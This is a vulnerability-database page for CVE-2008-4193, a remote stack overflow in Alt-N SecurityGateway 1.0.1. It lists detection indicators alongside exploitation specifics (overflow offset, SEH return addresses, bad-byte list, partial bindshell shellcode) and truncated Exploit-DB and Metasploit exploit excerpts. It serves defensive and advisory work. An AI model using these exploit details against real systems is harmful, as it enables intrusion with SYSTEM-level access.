CVE-2008-4193
published 2008-09-24CVE-2008-4193: Stack-based buffer overflow in SecurityGateway.dll in Alt-N Technologies SecurityGateway 1.0.1 allows remote attackers to execute arbitrary code via a long…
PriorityP266critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
74.61%
99.4th percentile
Stack-based buffer overflow in SecurityGateway.dll in Alt-N Technologies SecurityGateway 1.0.1 allows remote attackers to execute arbitrary code via a long username parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alt-n | securitygateway | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
Bindshell shellcode (port 9998): \x6a\x20\x5b\x93\xf7\xe0\x91\xe8\xff\xff\xff\xff\x30\x5e...
- →Detect exploit attempts by monitoring HTTP POST requests to /SecurityGateway.dll on port 4000 with an abnormally long 'username' parameter (overflow triggers at ~720 chars, payload space is 476 bytes). ↗
- →Look for POST body containing 'RequestedPage=login' with a 'username' field exceeding normal length bounds sent to /SecurityGateway.dll. ↗
- →The exploit uses an SEH-based overwrite; monitor for return address 0x6767756f (XceedZip.dll p/p/r) or 0x67672190 appearing in crash dumps or memory analysis of SecurityGateway process. ↗
- →Fingerprint the vulnerable service by sending a GET to /SecurityGateway.dll and checking the response for 'SecurityGateway 1.0.1' in the banner, as used by the Metasploit auto-targeting logic. ↗
- →Successful exploitation results in a bind shell on port 9998 (shellcode default); monitor for unexpected listening services on port 9998 on Windows hosts running SecurityGateway. ↗
- ·The service does not restart after exploitation; only one exploitation attempt is possible per service instance. ↗
- ·The username input is lowercased via CharLowerBuff() before the overflow, restricting usable shellcode bytes; payloads must avoid uppercase (0x41-0x5A), 0x00, 0x40, 0x7B, 0xAA, 0xC0-0xC2, 0x80-0x81. ↗
- ·Successful exploitation yields SYSTEM-level privileges due to the privilege level of the SecurityGateway service process. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (Metasploit)
exploitdb·2010-07-07
CVE-2008-4193 Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (Metasploit)
Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (Metasploit)
---
##
# $Id: altn_securitygateway.rb 9719 2010-07-07 17:38:59Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Alt-N SecurityGateway username Buffer Overflow',
'Description' => %q{
Alt-N SecurityGateway is prone to a buffer overflow condition. This
is due to insufficien
Exploit-DB
Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow
exploitdb·2008-06-15
CVE-2008-4193 Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow
Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Alt-N SecurityGateway v1.00-1.01
* ----------------------------------------
* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
* Exploit date : 11.06.2008-14.06.2008
* Exploit writer : Heretic2 ([email protected])
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Details : Obtain the overflow and crash the application is peace a cake job.
* To make a wroking code execution here is a hell. First we can see that
* the username before overflow the buffer pass through some functions,
* that changes and restrict some useful chars. Firstly the beffer gets
* lowered so the overflow should not contai
Exploit-DB
Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)
exploitdb·2008-06-01
CVE-2008-4193 Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)
Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)
---
##################################################################################################################
# SecurityGateway 1.0.1 Remote Buffer Overflow ( username)
# Vendor: http://www.altn.com/
# risk : critical
#SecurityGateway open port 4000 for remote administration/managment, EIP get owned when the username field is filled with 720 chars
#
#eax=00000000 ebx=00000000 ecx=63636363 edx=7c9137d8 esi=00000000 edi=00000000
#eip=63636363 esp=042ce910 ebp=042ce930 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
#63636363 ?? ???
#
# Replace http://127.0.0.1:4000/ with your remote host.
use LWP::UserAgent;
$connect = LWP::UserAgent->new;
my $payload1 ="a" x 236;
my
Metasploit
Alt-N SecurityGateway username Buffer Overflow
metasploit
Alt-N SecurityGateway username Buffer Overflow
Alt-N SecurityGateway username Buffer Overflow
Alt-N SecurityGateway is prone to a buffer overflow condition. This is due to insufficient bounds checking on the "username" parameter. Successful exploitation could result in code execution with SYSTEM level privileges. NOTE: This service doesn't restart, you'll only get one shot. However, it often survives a successful exploitation attempt.
No writeups or analysis indexed.
http://files.altn.com/securitygateway/release/relnotes_en.htmhttp://secunia.com/advisories/30497http://securityreason.com/securityalert/4302http://www.securityfocus.com/bid/29457http://www.securitytracker.com/id?1020156http://www.vupen.com/english/advisories/2008/1717/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42769https://www.exploit-db.com/exploits/5718https://www.exploit-db.com/exploits/5827http://files.altn.com/securitygateway/release/relnotes_en.htmhttp://secunia.com/advisories/30497http://securityreason.com/securityalert/4302http://www.securityfocus.com/bid/29457http://www.securitytracker.com/id?1020156http://www.vupen.com/english/advisories/2008/1717/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42769https://www.exploit-db.com/exploits/5718https://www.exploit-db.com/exploits/5827
2008-09-24
Published